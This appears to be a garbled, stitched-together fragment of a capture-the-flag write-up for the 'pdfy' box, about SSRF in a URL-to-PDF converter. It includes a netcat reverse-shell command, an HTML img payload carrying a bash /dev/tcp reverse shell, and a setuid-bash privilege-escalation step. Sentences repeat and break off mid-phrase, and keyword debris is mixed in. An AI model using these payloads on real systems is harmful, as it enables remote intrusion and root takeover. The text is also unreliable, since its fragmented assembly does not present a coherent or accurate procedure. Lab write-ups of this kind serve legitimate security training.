If you are attempting this box, focus on the ( file:// , gopher:// ) and the metadata of the files you are asking the server to process. The flag is usually found in /root/root.txt or a similar standard location after escalating privileges via a misconfigured script or binary.
Insecure PDF generation from user-supplied URLs. Attack Vector: SSRF via a 302 Redirect bypass. pdfy htb writeup upd
# Establish a reverse shell os.system('nc 10.10.14.12 4444 -e /bin/bash') If you are attempting this box, focus on
<img src="http://127.0.0.1:8080/generate?html=<pre>$(bash -i >& /dev/tcp/10.10.14.XX/4444 0>&1)</pre>"> Attack Vector: SSRF via a 302 Redirect bypass
Use SSRF to interact with this internal service:
Upon launching the challenge, you are greeted with a simple web interface that prompts for a URL. The application’s stated purpose is to "turn your favorite web pages into portable PDF documents".
After restarting the pdfy-converter service, we verify that the /bin/bash shell has been modified to have setuid permissions. We then execute the /bin/bash shell to gain root access.